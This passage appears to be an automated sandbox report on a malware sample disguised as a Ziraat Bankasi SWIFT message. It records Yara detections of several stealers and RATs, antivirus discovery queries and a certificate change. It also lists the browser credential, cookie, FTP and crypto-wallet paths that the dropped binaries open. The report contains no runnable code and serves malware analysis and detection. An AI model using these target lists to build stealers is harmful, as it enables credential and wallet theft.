Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Queries volume information: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Queries volume information: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: build.exe, 00000009.00000002.2714774589.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, apihost.exe, 0000001B.00000002.4622933570.00000000440F4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 8.2.XClient.exe.1d020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1d020000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected Phoenix Stealer

Source: Yara match

File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2148223816.0000000006F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 8.2.XClient.exe.1d380000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41b07a0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.4246bf0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1d380000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.4246bf0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41fb9d0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.build.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41b07a0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41fb9d0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2942525040.000000001D380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2120832413.0000000000592000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130198719.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 8.0.XClient.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4577783321.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YkxAHNcqEmoeLS.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: apihost.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: XClient.exe, 00000008.00000002.2652391836.00000000030B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: &%localappdata%\Coinomi\Coinomi\wallets
Source: XClient.exe, 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
